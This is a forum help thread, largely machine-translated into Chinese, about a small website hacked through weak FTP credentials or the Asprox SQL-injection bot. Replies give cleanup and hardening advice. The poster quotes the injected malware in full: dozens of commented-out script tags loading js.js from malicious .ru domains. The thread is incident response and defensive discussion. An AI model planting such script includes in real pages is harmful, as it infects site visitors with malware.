我的网站被黑了..我该怎么办?

我爸爸今天打电话给我说,去他的网站的人有168种病毒试图下载到他们的电脑上。他根本不是技术人员,而是用一个所见即所得的编辑器来构建整个事情。

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

所以我现在评论它。事实证明,他的FTP密码是一个六个字母的普通字典单词,所以我们认为它是如何被黑客入侵的。我们已经将他的密码更改为8位数以外的非字串(他不会为了密码而进行搜索,因为他是一个追捕者)。

我做了一个 whoh在98hs.ru ,发现它是从智利的一台服务器托管的。其实也有一个电子邮件地址,但我严重怀疑这个人是罪魁祸首。可能只是其他一些被黑客攻击的网站...

我不知道现在该怎么做,因为我从来没有处理过这种事情。任何人有任何建议?

他通过webhost4life.com使用纯粹的未加密的ftp。我甚至没有在他们的网站上看到 do sftp的方法。我在想他的用户名和密码被拦截?

因此,为了使其与社区更相关,您应该采取哪些步骤/您应该遵循哪些最佳做法,以保护您的网站免遭黑客攻击?

为了记录,这里是“神奇地”添加到他的文件中的代码行(并且不在他计算机上的文件中 - 我已经将其注释掉了,以便绝对确保它不会做任何事情在这个页面上,虽然我确信杰夫会警惕这一点):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js>
0
额外 编辑
意见: 1
只是fww,webhost4life确实在2222端口有sftp。
额外 作者 ruffin,

8 答案

我知道这个游戏有点晚了,但是提到的JavaScript的网址在已知是6月份启动的ASPRox bot复活的一部分的网站列表中提到过(至少在我们被标记为它)。关于它的一些细节在下面提到:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

令人讨厌的是,实际上数据库中的每个varchar类型字段都会被“感染”,以便吐出对此URL的引用,其中浏览器获取一个小型iframe,将其变为bot。一个基本的SQL修复可以在这里找到:

http://aspadvice.com/blogs/programming_shorts/存档/ 2008/6月27日/ Asprox,Recovery.aspx

但可怕的是,病毒会在系统表中寻找感染的值,并且大量共享主机计划也会为其客户共享数据库空间。所以最有可能的是,甚至连你父亲的网站都被感染了,但是他的主机集群中的其他人的网站写了一些不好的代码,并打开了SQL注入攻击的大门。

如果他还没有这样做,我会发送紧急电子邮件给他们的主机,并给他们一个链接到该SQL代码来修复整个系统。您可以修复自己受影响的数据库表格,但很可能感染病毒的机器人会再次通过该漏洞并感染整个系统。

希望这给你一些更多的信息来处理。

编辑:还有一个快速的想法,如果他使用其中一个主机在线设计工具来构建他的网站,那么所有这些内容可能都坐在一列中,并且被感染了。

0
额外

你提到你的爸爸正在使用网站发布工具。

如果发布工具从他的计算机发布到服务器,则可能是他的本地文件干净,而且他只需要重新发布到服务器。

他应该看看他的服务器是否有与普通FTP不同的登录方法,但是...这不是很安全,因为它通过互联网发送他的密码为明文。

0
额外

尽量收集尽可能多的信息。查看主持人是否可以给你一个日志,显示你的帐户所有的FTP连接。您可以使用它们来查看它是否是用于进行更改并可能获得IP地址的FTP连接。

如果您使用的是预装软件,如Wordpress,Drupal或其他任何您没有编码的软件,那么上传代码时可能存在漏洞,允许进行此类修改。如果是定制的,请仔细检查允许用户上传文件或修改现有文件的任何地方。

第二件事是按现状转储网站并检查其他所有修改。这可能只是他们做出的一个单一修改,但是如果他们通过FTP知道了还有什么是的话。

将您的网站恢复到已知的良好状态,如果需要,请升级到最新版本。

你也必须考虑到一定的回报水平。值得追查的人受到的伤害是否值得,或者是你刚刚生活和学习并使用更强密码的东西?

0
额外

用六字的字符密码,他可能会被强行强行。这比他的ftp被拦截的可能性更大,但也可能是这样。

从更强的密码开始。 (8个字符仍然很弱)

看看这个链接到互联网安全博客是否有帮助。

0
额外

该网站只是简单的静态HTML?即他还没有设法为他自己编写一个上传页面,允许任何人驾车上传受损脚本/页面?

为什么不问问webhost4life如果他们有任何可用的FTP日志并向他们报告问题。你永远不知道,他们可能非常容易接受,并为你发现究竟发生了什么?

我为一个共享主机工作,我们总是欢迎这样的报告,并且通常可以精确定位基于攻击的确切向量,并就客户出错的位置提供建议。

0
额外

我们显然已经从同一个人被黑客入侵了!或者是机器人,就我们而言。他们在一些老的经典ASP站点的URL上使用SQL注入,这些站点没有人再维护。我们发现攻击IP并在IIS中阻止它们。现在我们必须重构所有旧的ASP。 所以,我的建议是首先查看IIS日志,以发现问题是否出现在您网站的代码或服务器配置中。

0
额外

拔下网络服务器而不关闭网络服务器以避免关闭脚本。通过另一台计算机分析硬盘作为数据驱动器,并查看是否可以通过日志文件和此类事物确定罪魁祸首。验证代码是否安全,然后从备份中恢复。

0
额外

最近发生在ipower上的一个客户发生了这种情况。我不确定您的托管环境是否基于Apache,但是如果确实要仔细检查您没有创建的.htaccess文件,特别是在webroot和图像目录的上方,因为它们倾向于在那里注入一些不适(他们正在重定向人员,取决于他们来自哪里)。另外,检查您为没有编写的代码创建的任何代码。

0
额外